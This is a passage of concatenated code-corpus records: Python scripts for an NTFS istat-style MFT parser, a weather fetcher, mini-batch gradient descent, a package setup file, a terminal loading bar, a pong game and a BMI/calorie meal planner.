attribute_offset\n return mft_bytes[start:start+16]\n\ndef get_attribute_type(attribute_header):\n return as_signed_le(attribute_header[0:4])\n\n#in bytes already\ndef
get_attribute_size(attribute_header):\n return as_signed_le(attribute_header[4:8])\n\ndef get_attribute_non_resident_flag(attribute_header):\n return as_signed_le(attribute_header[8:9])\n\n\ndef istat_ntfs(f, address, sector_size=512, offset=0):\n\n data = f.read()\n # if offset != 0:\n # data = data[offset * sector_size:len(data)]\n # f.seek((offset+32) * sector_size + address * 1024)\n # mft_entry = f.read(1024)\n result = []\n\n sector_per_cluster = get_cluster_size(data) / sector_size #get_sector_size(data)\n\n mft_length = get_mft_entry_size(data)\n mft_start_sector = get_first_mft_cluster(data) * sector_per_cluster\n mft_offset = ((offset + int(mft_start_sector)) * sector_size + address * mft_length)\n\n #mft entry bytes data\n mft_entry = data[mft_offset:mft_offset+mft_length]\n\n #Fixup array\n # fixup_offset = as_signed_le(mft_entry[4:6])\n # fixup_num_entries = as_signed_le(mft_entry[6:8])\n # fixup_arr = mft_entry[fixup_offset:2*fixup_num_entries+fixup_offset]\n # fixup_index = 0\n\n # print('fixup: ', fixup_arr)\n # print('sec 1: ', mft_entry[sector_size-2: sector_size])\n # print('sec 2: ', mft_entry[sector_size*2 - 2: sector_size*2])\n # print('sec 3: ', mft_entry[sector_size*3 - 2: sector_size*3])\n # for i in range(fixup_num_entries):\n # print('before: ', mft_entry[(i+1)*sector_size-2:(i+1)*sector_size])\n # mft_entry = mft_entry[i*sector_size:i*sector_size+(sector_size-2)] + fixup_arr[fixup_index:fixup_index+2] + mft_entry[(i+1)*sector_size:]\n # fixup_index += 2\n # print('after: ', mft_entry[(i + 1) * sector_size - 2:(i + 1) * sector_size])\n\n #how to get fixup array?\n\n #MFT Entry Header Values\n result.append('MFT Entry Header Values:')\n result.append('Entry: {} Sequence: {}'.format(address, as_signed_le(mft_entry[16:18]))) #Spacing Error?\n result.append('$LogFile Sequence Number: {}'.format(as_signed_le(mft_entry[8:16])))\n result.append('Allocated File')\n result.append('Links: {}'.format(as_signed_le(mft_entry[18:20])))\n result.append('')\n\n\n #$STANDARD_INFORMATION Attribute Values:\n std_info_attr = retrieve_attribute(mft_entry, 16)\n #print('std info length: ', len(std_info_attr))\n #std_info_attr_header = get_attribute_header(std_info_attr, 0)\n std_info_content_offset = as_signed_le(std_info_attr[20:22])\n std_info_attr_content = std_info_attr[std_info_content_offset:]\n std_info_flag = as_signed_le(std_info_attr_content[32:36])\n std_info_flag_type = ''\n std_info_content_size = as_signed_le(std_info_attr[16:20])\n\n\n if std_info_flag & 0x0002: #what other more flags to check?\n std_info_flag_type += 'Hidden'\n if std_info_flag & 0x0020:\n std_info_flag_type += 'Archive'\n\n result.append('$STANDARD_INFORMATION Attribute Values:')\n result.append('Flags: {}'.format(std_info_flag_type))\n result.append('Owner ID: {}'.format(0))\n result.append('Created:\\t{}'.format(into_localtime_string(as_signed_le(std_info_attr_content[0:8])))) #decode might be wrong\n result.append('File Modified:\\t{}'.format(into_localtime_string(as_signed_le(std_info_attr_content[8:16]))))\n result.append('MFT Modified:\\t{}'.format(into_localtime_string(as_signed_le(std_info_attr_content[16:24]))))\n result.append('Accessed:\\t{}'.format(into_localtime_string(as_signed_le(std_info_attr_content[24:32]))))\n result.append('')\n\n #$FILE_NAME Attribute Values:\n file_name_attr = retrieve_attribute(mft_entry, 48)\n file_name_content_offset = as_signed_le(file_name_attr[20:22])\n file_name_attr_content = file_name_attr[file_name_content_offset:]\n file_name_flag = 
as_signed_le(file_name_attr_content[56:60])\n file_name_flag_type = ''\n file_name_content_size = as_signed_le(file_name_attr[16:20])\n\n if file_name_flag & 0x0002: #what other more flags to check?\n file_name_flag_type += 'Hidden'\n if file_name_flag & 0x0020:\n file_name_flag_type += 'Archive'\n\n allocated_size = as_signed_le(file_name_attr_content[40:48])\n actual_size = as_signed_le(file_name_attr_content[48:56])\n file_name_reference = file_name_attr_content[0:8]\n parent_entry = as_signed_le(file_name_reference[:6])\n sequence = as_signed_le(file_name_reference[6:])\n\n name = file_name_attr_content[66:].decode('ascii', 'ignore').strip()\n stripped_name = ''\n for c in name:\n if 0x20 <= ord(c) <= 0x7E:\n stripped_name += c\n\n result.append('$FILE_NAME Attribute Values:')\n result.append('Flags: {}'.format(file_name_flag_type))\n result.append('Name: {}'.format(stripped_name)) #file name?\n result.append('Parent MFT Entry: {} \\tSequence: {}'.format(parent_entry, sequence))\n result.append('Allocated Size: {} \\tActual Size: {}'.format(allocated_size, actual_size))\n result.append('Created:\\t{}'.format(into_localtime_string(as_signed_le(file_name_attr_content[8:16])))) # decode might be wrong\n result.append('File Modified:\\t{}'.format(into_localtime_string(as_signed_le(file_name_attr_content[16:24]))))\n result.append('MFT Modified:\\t{}'.format(into_localtime_string(as_signed_le(file_name_attr_content[24:32]))))\n result.append('Accessed:\\t{}'.format(into_localtime_string(as_signed_le(file_name_attr_content[32:40]))))\n result.append('')\n\n #Attributes:\n data_attr = retrieve_attribute(mft_entry, 128)\n data_attr_header = data_attr[:16]\n non_resident_flag = 0\n if get_attribute_non_resident_flag(data_attr_header) == 1:\n non_resident_flag = 1\n cluster_arr = []\n\n if non_resident_flag:\n runlist_offset = as_signed_le(data_attr[32:34])\n prev_offset = 0\n\n while runlist_offset < len(data_attr) and as_signed_le(data_attr[runlist_offset:runlist_offset+1]) != 0: #when to stop?\n field_byte = data_attr[runlist_offset]\n offset_field = field_byte >> 4\n mask = 0b1111\n length_field = field_byte & mask#(field_byte << 4) >> 8\n\n runlist_offset += 1\n length_value = as_signed_le(data_attr[runlist_offset:runlist_offset+length_field])\n\n runlist_offset += length_field\n offset_value = as_signed_le(data_attr[runlist_offset:runlist_offset+offset_field])\n\n start = prev_offset + offset_value\n prev_offset = start\n end = start + length_value\n while start < end:\n cluster_arr.append(start)\n start += 1\n\n runlist_offset += offset_field\n\n result.append('Attributes:')\n result.append('Type: $STANDARD_INFORMATION (16-0) Name: N/A Resident size: {}'.format(std_info_content_size))\n result.append('Type: $FILE_NAME (48-3) Name: N/A Resident size: {}'.format(file_name_content_size))\n if not non_resident_flag:\n result.append('Type: $DATA (128-2) Name: N/A Resident size: {}'.format(as_signed_le(data_attr[16:20])))\n else:\n data_actual_size = as_signed_le(data_attr[48:56])\n data_init_size = as_signed_le(data_attr[56:64])\n result.append('Type: $DATA (128-2) Name: N/A Non-Resident size: {} init_size: {}'.format(data_actual_size, data_init_size ))\n n = 0\n str = ''\n for cluster in cluster_arr:\n if n < 8:\n str += '{} '.format(cluster)\n n += 1\n else:\n result.append(str.strip())\n str = '{} '.format(cluster)\n n = 1\n if n <= 8:\n result.append(str.strip())\n\n return result\n\ndef retrieve_attribute(mft_entry, attribute_type):\n attr_offset = 
56#get_first_attribute_offset(mft_entry)\n attr_header = get_attribute_header(mft_entry, attr_offset)\n attr_type = get_attribute_type(attr_header)\n attr_size = get_attribute_size(attr_header)\n attr = mft_entry[attr_offset:attr_offset+attr_size] #attribute data\n\n while (attr_type is not attribute_type) and attr_offset+attr_size < len(mft_entry):\n attr_offset = attr_offset + attr_size\n attr_header = get_attribute_header(mft_entry, attr_offset)\n attr_type = get_attribute_type(attr_header)\n attr_size = get_attribute_size(attr_header)\n attr = mft_entry[attr_offset:attr_offset+attr_size]\n\n return attr\n\n\n\n\n\n\ndef into_localtime_string(windows_timestamp):\n \"\"\"\n Convert a windows timestamp into istat-compatible output.\n\n Assumes your local host is in the EDT timezone.\n\n :param windows_timestamp: the struct.decoded 8-byte windows timestamp\n :return: an istat-compatible string representation of this time in EDT\n \"\"\"\n dt = datetime.datetime.fromtimestamp((windows_timestamp - 116444736000000000) / 10000000)\n hms = dt.strftime('%Y-%m-%d %H:%M:%S')\n fraction = windows_timestamp % 10000000\n return hms + '.' + str(fraction) + '00 (EDT)'\n\n\nif __name__ == '__main__':\n import argparse\n\n '''parser = argparse.ArgumentParser(description='Display details of a meta-data structure (i.e. inode).')\n parser.add_argument('-o', type=int, default=0, metavar='imgoffset',\n help='The offset of the file system in the image (in sectors)')\n parser.add_argument('-b', type=int, default=512, metavar='dev_sector_size',\n help='The size (in bytes) of the device sectors')\n parser.add_argument('image', help='Path to an NTFS raw (dd) image')\n parser.add_argument('address', type=int, help='Meta-data number to display stats on')\n args = parser.parse_args()'''\n #with open(args.image, 'rb') as f:\n #result = istat_ntfs(f, args.address, args.b, args.o)\n with open('image.ntfs', 'rb') as f:\n result = istat_ntfs(f, 64)\n for line in result:\n print(line.strip())","sub_path":"istat_ntfs.py","file_name":"istat_ntfs.py","file_ext":"py","file_size_in_byte":11178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"292912978","text":"import urllib.request\nimport json\n\ndef weather2text():\n\ttext = '\\n'\n\turl = 'http://weather.livedoor.com/forecast/webservice/json/v1?city=130010'\n\thtml = urllib.request.urlopen(url)\n\tresp = json.loads(html.read().decode('utf-8'))\n\n\ttext += '**************************' + '\\n'\n\ttext += resp['title'] + '\\n'\n\ttext += '**************************' + '\\n'\n\ttext += resp['description']['text'] + '\\n'\n\n\tfor forecast in resp['forecasts']:\n\t\ttext += '**************************' + '\\n'\n\t\ttext += forecast['dateLabel'] + '(' + forecast['date'] + ')' + '\\n'\n\t\ttext += forecast['telop'] + '\\n'\n\n\ttext += '**************************' + '\\n'\n\n\treturn text","sub_path":"application/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"172549137","text":"import numpy as np\r\nfrom numpy import random\r\nimport matplotlib.pyplot as plt\r\n\r\n#loading input file\r\nprint(\"\\n\")\r\nuser_input = input(\"Enter your input filename with extension (ex: input.txt): \")\r\nfile_input = np.loadtxt(user_input)\r\n\r\n#defining input data\r\nprint(\"\\n\")\r\ncolumn_x = input(\"The data to predict (input x) are in column (ex: 1 or 2 or etc.): \")\r\ncolumn_y = input(\"The data to 
be predicted (input y) are in column (ex: 1 or 2 or etc.): \")\r\nx = np.array(file_input[:, (int(column_x) - 1)])\r\ny = np.array(file_input[:, (int(column_y) - 1)])\r\nlabel_x = input(\"The label for input x: \")\r\nlabel_y = input(\"The label for input y: \")\r\nprint(\"\\n\")\r\nprint(\"\\n\", label_x, \"\\n\", x)\r\nprint(\"\\n\", label_y, \"\\n\", y)\r\nprint(\"\\n\", \"Length of \", label_x, \": \", len(x))\r\nprint(\"\\n\", \"Length of \", label_y, \": \", len(y))\r\nprint(\"\\n\")\r\n\r\nprint(\"\\n\")\r\n#defining initial parameter\r\nslope = input(\"Input the initial guess of the slope (suggestion: 1): \")\r\nintercept = input(\"Input the initial guess of the intercept (suggestion: 0): \")\r\nlearning_rate = input(\"Input the learning rate (alpha) (suggestion: 0.01): \")\r\nminimum_gradient = input(\"Input the minimum gradient (suggestion: 0.0009): \")\r\nmaximum_iterations = input(\"Input the maximum number of iterations (suggestion: 10000): \")\r\nmini_batch = input(\"Input the number of data you want to use in the mini batch: \")\r\n\r\n#converting input to float\r\nslope = float(slope)\r\nintercept = float(intercept)\r\nlearning_rate = float(learning_rate)\r\nminimum_gradient = float(minimum_gradient)\r\nmaximum_iterations = float(maximum_iterations)\r\nmini_batch = int(mini_batch)\r\n\r\n#initial predicted line\r\nmodel_x = np.arange((min(x) - (min(x) / 10)), (max(x) + (max(x) / 10)), (len(x) / 100))\r\nmodel_y_initial = (slope * model_x) + intercept\r\n\r\neq_initial = \"Initial Line: Y = (\" + str(np.around(slope, 3)) + \")\" + \"X\" + \" + \" + \"(\" + str(np.around(intercept, 3)) + \")\"\r\n\r\n#gradient descent function, using loss function = sum square residual\r\ndef gradient_descent(x, y, slope, intercept, learning_rate, minimum_gradient, maximum_iterations, mini_batch) :\r\n    iterations = 0\r\n    #looping\r\n    looping = \"continue\"\r\n\r\n    tot_gradient_slope = []\r\n    tot_gradient_intercept = []\r\n    tot_slope = []\r\n    tot_intercept = []\r\n    tot_ssr = []\r\n\r\n    while looping == \"continue\" :\r\n        ssr = np.sum((y - ((slope * x) + intercept)) * (y - ((slope * x) + intercept)))\r\n        \r\n        x_random = []\r\n        y_random = []\r\n\r\n        while len(x_random) < mini_batch :\r\n            random_index = random.randint(len(x))\r\n            x_random.append(x[random_index])\r\n            y_random.append(y[random_index])\r\n\r\n        x_random = np.array(x_random)\r\n        y_random = np.array(y_random)\r\n        \r\n        gradient_slope = np.sum(-2 * x_random * (y_random - ((slope * x_random) + intercept)))\r\n        gradient_intercept = np.sum(-2 * (y_random - ((slope * x_random) + intercept)))\r\n        \r\n        step_size_slope = gradient_slope * learning_rate\r\n        step_size_intercept = gradient_intercept * learning_rate\r\n        \r\n        slope = slope - step_size_slope\r\n        intercept = intercept - step_size_intercept\r\n\r\n        if str(gradient_slope) == \"nan\" or str(gradient_intercept) == \"nan\" :\r\n            slope = 1\r\n            intercept = 0\r\n            learning_rate = learning_rate / 10\r\n            iterations = 0\r\n            \r\n            tot_gradient_slope = []\r\n            tot_gradient_intercept = []\r\n            tot_slope = []\r\n            tot_intercept = []\r\n            tot_ssr = []\r\n            \r\n        if abs(gradient_slope) < minimum_gradient and abs(gradient_intercept) < minimum_gradient :\r\n            looping = \"stop\"\r\n        elif iterations > maximum_iterations :\r\n            looping = \"stop\"\r\n\r\n        tot_gradient_slope.append(gradient_slope)\r\n        tot_gradient_intercept.append(gradient_intercept)\r\n        tot_slope.append(slope)\r\n        tot_intercept.append(intercept)\r\n        tot_ssr.append(ssr)\r\n\r\n        iterations = iterations + 1\r\n\r\n        
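# The update above is plain gradient descent on the residual sum of squares\r\n        # L(m, b) = sum((y - (m*x + b))**2), whose partial derivatives are\r\n        # dL/dm = sum(-2*x*(y - (m*x + b))) and dL/db = sum(-2*(y - (m*x + b))),\r\n        # here evaluated on a random mini-batch instead of the full data set.\r\n        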
print(\"\\n\", iterations, \"iteration(s) is done\")\r\n        print(\"\\n\", \"The Sum of Square Residual (SSR): \", ssr)\r\n        print(\"\\n\", \"The Gradient of The SSR and The Slope is: \", gradient_slope)\r\n        print(\"\\n\", \"The Gradient of The SSR and The Intercept is: \", gradient_intercept)\r\n        print(\"\\n\", \"The Slope: \", slope)\r\n        print(\"\\n\", \"The Intercept: \", intercept)\r\n        print(\"\\n\", \"The Learning Rate (alpha): \", learning_rate, \"\\n\")\r\n        \r\n        if looping == \"continue\" :\r\n            print(\"\\n\", \"The Loop is Continuing . . .\")\r\n        else :\r\n            print(\"\\n\", \"The Loop is Stopped . . .\")\r\n    \r\n    return slope, intercept, gradient_slope, gradient_intercept, tot_gradient_slope, tot_gradient_intercept, tot_slope, tot_intercept, tot_ssr, learning_rate\r\n\r\nslope, intercept, gradient_slope, gradient_intercept, tot_gradient_slope, tot_gradient_intercept, tot_slope, tot_intercept, tot_ssr, learning_rate = gradient_descent(x, y, slope, intercept, learning_rate, minimum_gradient, maximum_iterations, mini_batch)\r\n\r\n#linear regression line\r\nmodel_x = np.arange((min(x) - (min(x) / 10)), (max(x) + (max(x) / 10)), (len(x) / 100))\r\nmodel_y = (slope * model_x) + intercept\r\ny_pred = (slope * x) + intercept\r\n\r\neq = \"Predicted Line: Y = (\" + str(np.around(slope, 3)) + \")\" + \"X\" + \" + \" + \"(\" + str(np.around(intercept, 3)) + \")\"\r\n\r\n#correlation actual y against predicted y\r\nr = np.corrcoef(y, y_pred)[0, 1]\r\n\r\n#plotting\r\nfont1 = {\"family\":\"serif\",\"color\":\"#1D1D1D\",\"size\":14}\r\nfont2 = {\"family\":\"serif\",\"color\":\"#1D1D1D\",\"size\":12}\r\n\r\nplt.subplot(2, 2, 1)\r\nplt.plot(np.arange(0, len(tot_gradient_slope)), tot_gradient_slope, label = \"The Gradient of The SSR and The Slope\", c = \"crimson\")\r\nplt.plot(np.arange(0, len(tot_gradient_intercept)), tot_gradient_intercept, label = \"The Gradient of The SSR and The Intercept\", c = \"midnightblue\")\r\nplt.plot(np.arange(0, len(tot_ssr)), tot_ssr, label = \"The Sum of Square Residual (SSR)\", c = \"forestgreen\")\r\nplt.legend(loc = \"lower right\")\r\nplt.xlabel(\"Number of Iterations\", fontdict = font2)\r\nplt.ylabel(\"Amplitude\", fontdict = font2)\r\nplt.title((\"(Number of Iteration, Amplitude) \" + \", alpha: \" + str(learning_rate)), fontdict = font1)\r\nplt.grid()\r\n\r\nplt.subplot(2, 2, 2)\r\nplt.scatter(np.arange(0, len(tot_slope)), tot_slope, label = \"The Slope\", c = \"red\")\r\nplt.scatter(np.arange(0, len(tot_intercept)), tot_intercept, label = \"The Intercept\", c = \"blue\")\r\nplt.legend(loc = \"lower right\")\r\nplt.xlabel(\"Number of Iterations\", fontdict = font2)\r\nplt.ylabel(\"Amplitude\", fontdict = font2)\r\nplt.title((\"(Number of Iteration, Amplitude) \" + \", alpha: \" + str(learning_rate)), fontdict = font1)\r\nplt.grid()\r\n\r\nplt.subplot(2, 2, 3)\r\nplt.scatter(x, y, label = \"Data\", c = \"dodgerblue\")\r\nplt.plot(model_x, model_y, label = eq, c = \"black\")\r\nplt.plot(model_x, model_y_initial, label = eq_initial, c = \"red\")\r\nplt.legend(loc = \"lower right\")\r\nplt.xlabel(label_x, fontdict = font2)\r\nplt.ylabel(label_y, fontdict = font2)\r\nplt.title((\"(\" + label_x + \", \" + label_y + \")\"), fontdict = font1)\r\nplt.grid()\r\n\r\nplt.subplot(2, 2, 4)\r\nplt.scatter(y, y_pred, c = \"dodgerblue\")\r\nplt.xlabel((\"Actual \" + label_y), fontdict = font2)\r\nplt.ylabel((\"Predicted \" + label_y), fontdict = font2)\r\nplt.title((\"(Actual \" + label_y + \", \" + \"Predicted \" + label_y + \")\" + \", r = \" + str(np.around(r, 3))), fontdict = font1)\r\n
plt.grid()\r\n\r\nplt.subplots_adjust(hspace = 0.5)\r\n\r\nif str(gradient_slope) == \"nan\" or str(gradient_intercept) == \"nan\" :\r\n    print(\"\\n\", \"Plot cannot be done . . .\")\r\nelse :\r\n    plt.show()\r\n\r\nprint(\"\\n\")","sub_path":"mini_batch_stochastic_gradient_decent_ssr_linear_regression.py","file_name":"mini_batch_stochastic_gradient_decent_ssr_linear_regression.py","file_ext":"py","file_size_in_byte":7588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"627270031","text":"try:\n    from setuptools import setup, Extension\nexcept ImportError:\n    from distutils.core import setup, Extension\n\nfrom pynmrstar import __version__\n\ncnmrstar = Extension('cnmrstar',\n                     sources=['c/cnmrstarmodule.c'],\n                     extra_compile_args=[\"-funroll-loops\", \"-O3\"],\n                     optional=True)\n\ntry:\n    long_description = open('README.md', 'r').read()\nexcept IOError:\n    long_description = open('pynmrstar/README.md', 'r').read()\n\nsetup(name='pynmrstar',\n      version=__version__,\n      packages=['pynmrstar'],\n      ext_modules=[cnmrstar],\n      author='Jon Wedell',\n      author_email='wedell@bmrb.wisc.edu',\n      description='PyNMR-STAR provides tools for reading, writing, modifying, and interacting with NMR-STAR files. '\n                  'Maintained by the BMRB.',\n      long_description=long_description,\n      long_description_content_type='text/markdown',\n      keywords=['bmrb', 'parser', 'nmr', 'nmrstar', 'biomagresbank', 'biological magnetic resonance bank'],\n      url='https://github.com/uwbmrb/PyNMRSTAR',\n      license='MIT',\n      package_data={\n          'pynmrstar': ['reference_files/schema.csv', 'reference_files/comments.str', 'reference_files/data_types.csv',\n                        '.nocompile', 'README.md']},\n      classifiers=[\n          'Development Status :: 5 - Production/Stable',\n          'Environment :: Console',\n          'Programming Language :: Python :: 2',\n          'Programming Language :: Python :: 2.6',\n          'Programming Language :: Python :: 2.7',\n          'Programming Language :: Python :: 3',\n          'Programming Language :: Python :: 3.3',\n          'Programming Language :: Python :: 3.4',\n          'Programming Language :: Python :: 3.5',\n          'Programming Language :: Python :: 3.6',\n          'Intended Audience :: Developers',\n          'License :: OSI Approved :: GNU General Public License (GPL)',\n          'Natural Language :: English',\n          'Operating System :: MacOS',\n          'Operating System :: POSIX :: Linux',\n          'Topic :: Scientific/Engineering :: Bio-Informatics',\n          'Topic :: Software Development :: Libraries',\n          'Topic :: Software Development :: Libraries :: Python Modules'\n      ]\n      )\n","sub_path":"pypi_install_script/pynmrstar-2.6.5.1.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"226445359","text":"import time\nimport random\nfrom os import system, name\n\n#################\n# @AntoSoulaire #\n#################\n\n# Initialize the list that will be updated as the loading progresses\nbar = []\n\n# Fill the list with 20 empty values (so one slot gets filled every 5%)\nfor i in range(20):\n    bar.append('')\n\n# Pick a random number that will serve as the reference for the loading bar\nran = random.randint(4, 10) * 10\n\n# Loading loop (driven by the random value above)\nfor i in range(ran):\n\n    # Update the progress percentage 4 times per second\n    time.sleep(0.25)\n    pourc = ((i+1)/ran) * 100\n\n    # Check the value 'pourc'; every 5%, fill one of the empty slots of the 'bar' list\n    for x in range(len(bar)):\n        if ((x + 1) * 5) <= pourc:\n            # (Replace '' with '█')\n            bar[x] = '█'\n\n    # The value 'load' is used to display the 'bar' list as a string\n    load = \"\"\n    for x in range(len(bar)):\n        load += bar[x]\n\n    # Clear the terminal so that only one loading bar is shown, instead of 4 per second\n    # Note: works in the command prompt, but not in the console of some IDEs\n    if name == 'nt':\n        system('cls')\n    else:\n        system('clear')\n\n    # [Cosmetic] Always keep 4 digits displayed (for example 1.250 or 15.00 or 100.0)\n    pourc = str(float(int(pourc * 100))/100)\n    if len(pourc) < 5:\n        if pourc[1] == '.':\n            pourc = \"0\" + pourc\n        else:\n            pourc += \"0\"\n    if len(pourc) < 5:\n        pourc = \"0\" + pourc\n\n    # Final display\n    print(pourc + \"% \" + load)\n","sub_path":"Loading_v1.py","file_name":"Loading_v1.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"23462170","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport pygame\nimport pandas as pd\n\n# variables\nWIDTH = 1200\nHEIGHT = 600\nBORDER = 20\nVELOCITY = 4\nFRAMERATE = 320\n\n# classes\nclass Ball:\n    RADIUS = 20\n    \n    def __init__(self,x,y,vx,vy):\n        self.x = x\n        self.y = y\n        self.vx = vx\n        self.vy = vy\n    \n    def show(self, colour):\n        pygame.draw.circle(screen, colour, (self.x, self.y), self.RADIUS)\n    \n    def update(self):\n        newx = self.x + self.vx\n        newy = self.y + self.vy\n        \n        if newx < BORDER+self.RADIUS:\n            self.vx = -self.vx\n        elif newy < BORDER+self.RADIUS or newy > HEIGHT-BORDER-self.RADIUS:\n            self.vy = -self.vy\n        elif newx+Ball.RADIUS > WIDTH-Paddle.WIDTH \\\n            and abs(newy-paddle.y) < Paddle.HEIGHT//2:\n            self.vx = -self.vx\n        else:\n            self.show(bgColor)\n            self.x = newx\n            self.y = newy\n            self.show(fgColor)\n    \nclass Paddle: \n    WIDTH = 50\n    HEIGHT = 100\n    \n    def __init__(self,y):\n        self.y = y\n    \n    def show(self,colour):\n        pygame.draw.rect(screen, colour, \n            pygame.Rect(WIDTH-self.WIDTH, \n            self.y-self.HEIGHT//2, \n            self.WIDTH, self.HEIGHT))\n    \n    def update(self): \n        newy = pygame.mouse.get_pos()[1]\n        if newy-self.HEIGHT//2>BORDER \\\n and newy+self.HEIGHT//2BORDER \\\n and newy+self.HEIGHT//2 100: # Users age,\n
Calculating BMR and daily calories intake depending on users gender.\n daily_calories_intake = float(BMR) * float(K)\n elif user_gender == \"2\":\n BMR = 66.5 + (13.75 * float(user_weight)) + (5.0 * float(user_height)) - (6.8 * float(user_age))\n daily_calories_intake = float(BMR) * float(K)\n\n # Storing the information to \"register.json\" file\n\n user_data[user_ID] = [user_gender, user_age, user_weight, user_height, BMI, K, BMR, daily_calories_intake]\n with open(\"register.json\", 'w') as reg:\n json.dump(user_data, reg)\n\n print(\"-------------------------------------------\")\n while not choice == \"1\" or choice == \"Q\":\n choice = input(\"[1]. Go back to the menu.\\n[Q]. Quit the program.\\nChoose your next action: \")\n if choice == \"1\":\n menu_after_login(user_ID)\n elif choice == \"Q\":\n exit()\n\n# Login function which allows to log in or warn that such account does not exist.\n\ndef login():\n user_ID = input(\"Enter your personal number (ID): \")\n user_data = json.load(open(\"register.json\"))\n if user_ID in user_data:\n print(\"You have successfully logged in!\")\n menu_after_login(user_ID)\n else:\n print(\"Seems that such ID does not exist.\")\n menu()\n\n# A menu that follows user after his every action.\n\ndef menu_after_login(user_ID):\n choice = 0\n print(\"----------------------------------------\")\n while not choice in [1,2,3,4] or choice == \"Q\":\n print(\"[1]. Show current information about you.\\n[2]. Edit your information.\\n[3]. Generate week meal plan.\\nType [Q] to quit the program: \")\n choice = input(\"Select your action [1-3] or [Q]: \")\n if choice == \"1\":\n user_info(user_ID)\n elif choice == \"2\":\n edit_user_info(user_ID)\n elif choice == \"3\":\n meal_plan(user_ID)\n elif choice == \"Q\":\n exit()\n else:\n print(\"There is no such option. Try again.\")\n\n# Function used to output collected information about user.\n\ndef user_info(user_ID):\n choice = 0\n user_data = json.load(open(\"register.json\"))\n divider()\n if user_data[user_ID][0] == \"1\":\n print(\"Gender: Female\")\n else:\n print(\"Gender: Male\")\n print((\"Age: {}\").format(user_data[user_ID][1]))\n print((\"Weight: {} kg\").format(user_data[user_ID][2]))\n print((\"Height: {} cm\").format(user_data[user_ID][3]))\n print((\"BMI: {} [Body Mass Index]\").format(round(user_data[user_ID][4], 2)))\n print((\"K: {} [Physical activity rate]\").format(user_data[user_ID][5]))\n print((\"BMR: {} [Basal Metabolic Rate]\").format(user_data[user_ID][6]))\n print((\"Recommended daily caloric intake: {}\").format(user_data[user_ID][7]))\n divider()\n while not choice == \"1\" or choice == \"Q\":\n choice = input(\"[1]. Go back to the menu.\\n[Q]. Quit the program.\\nChoose your next action: \")\n if choice == \"1\":\n menu_after_login(user_ID)\n elif choice == \"Q\":\n exit()\n\n# Function used to change the information about user.\n# Changes are associated with one another. I.E. if user has changed his age,\n# the program will also change recommended daily calories intake, etc.\n\ndef edit_user_info(user_ID):\n user_data = json.load(open(\"register.json\"))\n choice = 0\n choice_inside_ifs = 0\n user_input = 0\n while not choice in [1,2,3,4] or choice == \"Q\":\n divider()\n print(\"[1]. Age.\\n[2]. Weight.\\n[3]. Height.\\n[4]. 
K.\\n[Q] to quit the program.\")\n choice = input(\"Select your action [1-5]: \")\n if choice == \"1\": # Changes if user has decided to change his age.\n user_input = input(\"Enter your age: \")\n user_data[user_ID][1] = user_input\n if_male_female_change(user_data, user_ID)\n with open(\"register.json\", 'w') as c:\n json.dump(user_data, c)\n print(\"You have successfully changed your age!\")\n menu_after_login(user_ID)\n elif choice == \"2\": # Changes if user has decided to change his weight.\n user_input = input(\"Enter your weight: \")\n user_data[user_ID][2] = user_input\n user_data[user_ID][4] = int(user_data[user_ID][2]) / ((int(user_data[user_ID][3]) / 100) * (int(user_data[user_ID][3]) / 100))\n if_male_female_change(user_data, user_ID)\n with open(\"register.json\", 'w') as c:\n json.dump(user_data, c)\n print(\"You have successfully changed your weight!\")\n menu_after_login(user_ID)\n elif choice == \"3\": # Changes if user has decided to change his height.\n user_input = input(\"Enter your height: \")\n user_data[user_ID][3] = user_input\n user_data[user_ID][4] = int(user_data[user_ID][2]) / ((int(user_data[user_ID][3]) / 100) * (int(user_data[user_ID][3]) / 100))\n if_male_female_change(user_data, user_ID)\n with open(\"register.json\", 'w') as c:\n json.dump(user_data, c)\n print(\"You have successfully changed your height!\")\n menu_after_login(user_ID)\n elif choice == \"4\": # Changes if user has decided to change his physical activity rate.\n while int(user_input) <= 0 or int(user_input) > 5:\n user_input = input(\"[1] - Little to no exercise,\\n[2] - Light exercise (1-3 days per week),\\n[3] - Moderate exercise (3-5 days per week),\\n[4] - Heavy exercise (6-7 days per week).\\n[5] - Very heavy exercise (6-7 days per week)\\nEnter your activity level(Type number from the options above that fits you best): \")\n if user_input == \"1\":\n user_data[user_ID][5] = 1.2\n elif user_input == \"2\":\n user_data[user_ID][5] = 1.375\n elif user_input == \"3\":\n user_data[user_ID][5] = 1.55\n elif user_input == \"4\":\n user_data[user_ID][5] = 1.75\n elif user_input == \"5\":\n user_data[user_ID][5] = 1.9\n if_male_female_change(user_data, user_ID)\n with open(\"register.json\", 'w') as c: # Storing changed information back to the file.\n json.dump(user_data, c)\n print(\"You have successfully changed your activity group!\")\n menu_after_login(user_ID)\n elif choice == \"Q\":\n exit()\n else:\n print(\"There is no such option. 
Try again.\")\n\n# Since changes are associated with one another, this function depending on the gender\n# calculates BMR and daily caloric intake.\n\ndef if_male_female_change(user_data, user_ID):\n    if user_data[user_ID][0] == \"1\":\n        user_data[user_ID][6] = 655 + (9.6 * float(user_data[user_ID][2])) + (1.8 * float(user_data[user_ID][3])) - (4.7 * float(user_data[user_ID][1]))\n        user_data[user_ID][7] = float(user_data[user_ID][6]) * float(user_data[user_ID][5])\n    elif user_data[user_ID][0] == \"2\":\n        user_data[user_ID][6] = 66.5 + (13.75 * float(user_data[user_ID][2])) + (5.0 * float(user_data[user_ID][3])) - (6.8 * float(user_data[user_ID][1]))\n        user_data[user_ID][7] = float(user_data[user_ID][6]) * float(user_data[user_ID][5])\n    return user_data\n\n# Recommendations for splitting calories throughout the day are:\n# 32,5% of the calories for breakfast, 37,5% for lunch, 30% for dinner.\n# By following these recommendations program will divide the chosen calories amount for these three meals.\n\ndef meal_plan(user_ID):\n    option = input(\"Would you like to use your calories recommendation (1) for the plan or would you like to enter your own calorie amount for the day (2)?\\nEnter: \")\n    if int(option) == 1:\n        with open(\"register.json\", 